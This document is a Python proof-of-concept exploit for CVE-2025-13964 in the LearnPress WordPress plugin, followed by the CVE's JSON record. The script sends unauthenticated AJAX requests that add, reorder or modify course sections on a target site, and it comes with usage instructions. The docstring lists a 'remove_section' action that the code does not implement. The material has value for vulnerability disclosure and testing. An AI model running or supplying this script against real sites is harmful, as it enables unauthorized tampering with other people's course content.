CVE-2025-13964

import requests import sys # CVE-2025-13964 PoC - LearnPress Unauthorized Data Modification # Target: WordPress site with LearnPress plugin <= 4.3.2 def exploit_learnpress(target_url, action_type): """ Exploit LearnPress IDOR vulnerability action_type: 'add_section', 'remove_section', 'reorder', 'update_item' """ ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # Common headers headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Action 1: Add new section (requires course_id) if action_type == 'add_section': data = { 'action': 'lp_ajax', # Or specific LearnPress AJAX action 'request': 'add_section', 'nonce': '', # No nonce required due to vulnerability 'course_id': '1', # Target course ID 'section_title': 'Malicious Section', 'section_order': '999' } # Action 2: Reorder sections elif action_type == 'reorder': data = { 'action': 'lp_ajax', 'request': 'reorder_section', 'course_id': '1', 'sections': '[{"id":1,"order":1},{"id":2,"order":0}]' } # Action 3: Update section items elif action_type == 'update_item': data = { 'action': 'lp_ajax', 'request': 'update_item', 'section_id': '1', 'item_type': 'lp_lesson', 'item_id': '1', 'item_data': '{"title":"Modified Content"}' } else: print("Unknown action type") return None try: response = requests.post(ajax_url, data=data, headers=headers, timeout=10) return response.text except requests.exceptions.RequestException as e: return f"Error: {str(e)}" if __name__ == '__main__': if len(sys.argv) < 3: print("Usage: python poc.py <target_url> <action_type>") print("Example: python poc.py http://example.com add_section") sys.exit(1) target = sys.argv[1] action = sys.argv[2] result = exploit_learnpress(target, action) print(f"Response: {result}")

{"cve": {"id": "CVE-2025-13964", "sourceIdentifier": "[email protected]", "published": "2026-01-06T09:15:54.513", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the catch_lp_ajax function in all versions up to, and including, 4.3.2. This makes it possible for unauthenticated attackers to modify course contents by adding/removing/updating/re-ordering sections or modifying section items."}, {"lang": "es", "value": "El plugin LearnPress – WordPress LMS Plugin para WordPress es vulnerable a la modificación no autorizada de datos debido a una verificación de capacidad faltante en la función catch_lp_ajax en todas las versiones hasta, e incluyendo, la 4.3.2. Esto hace posible que atacantes no autenticados modifiquen los contenidos del curso al añadir/eliminar/actualizar/reordenar secciones o modificar elementos de sección."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/Ajax/AbstractAjax.php#L18", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/Ajax/EditCurriculumAjax.php#L52", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae363511-8a1f-476a-9851-61f7763428c2?source=cve", "source": "[email protected]"}]}}